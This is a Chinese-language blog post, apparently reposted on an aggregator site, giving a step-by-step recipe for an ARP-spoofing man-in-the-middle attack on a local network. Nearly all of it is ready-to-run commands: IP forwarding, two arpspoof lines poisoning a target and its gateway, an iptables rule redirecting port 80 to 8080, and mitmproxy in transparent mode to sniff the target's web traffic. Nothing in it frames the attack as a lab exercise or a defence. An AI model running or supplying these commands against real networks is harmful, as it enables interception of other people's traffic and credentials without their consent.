首页 > 其他 > 详细

mimtproxy和arpspoof实现局域网MITM

时间:2018-01-14 12:32:24      阅读:20      评论:0      收藏:0      [点我收藏+]

标签:github   代理端   wid   bottom   border   欺骗   mar   idt   mil   

  本地环境

  环境:kali系统

  目标机器:192.168.0.101

  局域网网关:192.168.0.1

  当前网络网卡端口:wlan0

  arp欺骗流程

  命令行开启本地数据转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

  arpspoof局域网arp欺骗神器:

  欺骗网关,伪造我是目标机器:

arpspoof -i wlan0 -t 192.168.0.1 192.168.0.101

  欺骗目标机器:

arpspoof -i wlan0 -t 192.168.0.101 192.168.0.1

  然后目标机器的所有数据,都会走我们本地机器, 现在开始嗅探目标的数据请求信息,我们使用mitmproxy

  mitmproxy嗅探数据

  在本机kali机器执行iptables的数据转发,把所有经过80端口的数据,转发到8080:

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080

  使用mitmproxy启动代理服务, mimtproxy的默认代理端口为8080

 mitmproxy -T

 

技术分享图片 作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

mimtproxy和arpspoof实现局域网MITM

标签:github   代理端   wid   bottom   border   欺骗   mar   idt   mil   

原文:https://www.cnblogs.com/diligenceday/p/8111701.html

(0)
(0)
   
举报
评论 一句话评论(0
0条  
登录后才能评论!
© 2014 bubuko.com 版权所有 鲁ICP备09046678号-4
打开技术之扣,分享程序人生!
             

鲁公网安备 37021202000002号